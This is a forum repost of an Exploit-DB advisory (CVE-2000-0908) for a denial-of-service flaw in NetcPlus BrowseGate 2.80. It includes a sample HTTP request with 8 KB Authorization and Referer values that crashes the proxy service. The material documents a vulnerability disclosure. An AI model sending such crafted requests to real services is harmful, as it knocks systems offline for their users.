Exploit NetcPlus BrowseGate 2.80 - Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20233
Проверка EDB
  1. Пройдено
Автор
DELPHIS CONSULTING
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2000-0908
Дата публикации
2000-09-21
Код:
source: https://www.securityfocus.com/bid/1702/info

NetcPlus BrowseGate 2.80 will crash as the result of an invalid read error if a number of character strings consisting of 8 KB are inserted into GET request arguments through port 80.

For example:

GET / HTTP/1.0<cr>
Authorization: Basic(8 KB string of characters)<cr>
From: [email protected]<cr>
If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT<cr>
Referer: http://referrer/(8 KB string of characters)<cr>
UserAgent: Browser 1.1<cr>
<cr><cr>

will cause brwgate.exe to fail and a restart of the service is required in order to gain normal functionality.
 
Источник
www.exploit-db.com

Похожие темы